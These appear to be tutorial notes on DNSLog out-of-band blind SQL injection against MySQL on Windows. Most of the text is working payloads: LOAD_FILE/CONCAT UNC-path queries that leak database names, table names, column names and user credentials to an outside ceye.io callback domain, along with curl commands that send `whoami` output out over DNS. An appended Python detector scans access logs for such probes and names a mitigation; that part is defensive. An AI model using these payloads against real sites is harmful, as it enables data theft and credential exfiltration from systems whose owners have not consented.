Prerequisite: the target machine must be running Windows.

DNSLog blind injection

How DNSLog blind injection works



DNSLog platform: http://ceye.io/

http://ceye.io/profile
curl mzq83x.ceye.io

curl `whoami`.mzq83x.ceye.io


DNSLog blind injection method

Core syntax: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
The SQL statement must not contain special characters (the selected value ends up as a DNS label in the hostname, so only hostname-safe characters survive).

Enumerating tables, columns and data
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select column_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+


?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex(concat_ws('~',username,password)) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
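As an added detection example (not from these notes and not from the DnslogSqlinj project): a Python scanner over constructed web-server access-log lines that flags requests carrying a LOAD_FILE(CONCAT('\\\\', ...)) UNC probe and extracts the callback domain, so it can be blocked at the resolver or hunted for in DNS logs from the database host. The log lines are constructed, and the callback domain is the one reused from the payloads above rather than a live indicator.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined-log style); the callback
# domain is the one used in the payloads above, not a live indicator.
SAMPLE_LOG = (
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512\n'
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%27%20and%20'
    'LOAD_FILE(CONCAT(%27%5C%5C%5C%5C%27,(select%20database()),'
    '%27.mysql.r5ourp.ceye.io%5C%5Cabc%27))--+ HTTP/1.1" 200 512\n'
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%27%20and%20'
    'load_file(concat(%27%5C%5C%5C%5C%27,(select%20hex(database())),'
    '%27.mysql.r5ourp.ceye.io%5C%5Cx%27))--+ HTTP/1.1" 200 512\n'
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=load_file HTTP/1.1" 200 512\n'
)

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
LOAD_FILE_RE = re.compile(r"load_file\s*\(", re.IGNORECASE)
UNC_RE = re.compile(r"\\{2,}")  # run of two or more backslashes: a UNC prefix
CALLBACK_RE = re.compile(r"'\.([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\\")  # '.dom.ain\

def detect_dnslog_probe(line):
    """Return the attacker-controlled callback domain if the request line
    carries a LOAD_FILE + UNC-path out-of-band probe, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode %xx and '+' so payloads hidden by URL encoding are still seen.
    query = unquote_plus(urlsplit(m.group(1)).query)
    if not (LOAD_FILE_RE.search(query) and UNC_RE.search(query)):
        return None
    cb = CALLBACK_RE.search(query)
    return cb.group(1) if cb else "unparsed-callback-domain"

def scan_access_log(text):
    """Return a list of (client_ip, callback_domain) for every flagged request."""
    hits = []
    for line in text.splitlines():
        domain = detect_dnslog_probe(line)
        if domain:
            hits.append((line.split()[0], domain))
    return hits

# Mitigation reminder: on the database side, secure_file_priv=NULL disables
# LOAD_FILE entirely, which closes this channel regardless of web-tier filtering.
if __name__ == "__main__":
    for ip, domain in scan_access_log(SAMPLE_LOG):
        print(f"alert: {ip} sent a LOAD_FILE/UNC probe with callback {domain}")
```

Feed real access logs through scan_access_log and correlate the returned domains with outbound DNS queries from the database server to confirm whether a lookup actually left the network.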


https://github.com/ADOOO/DnslogSqlinj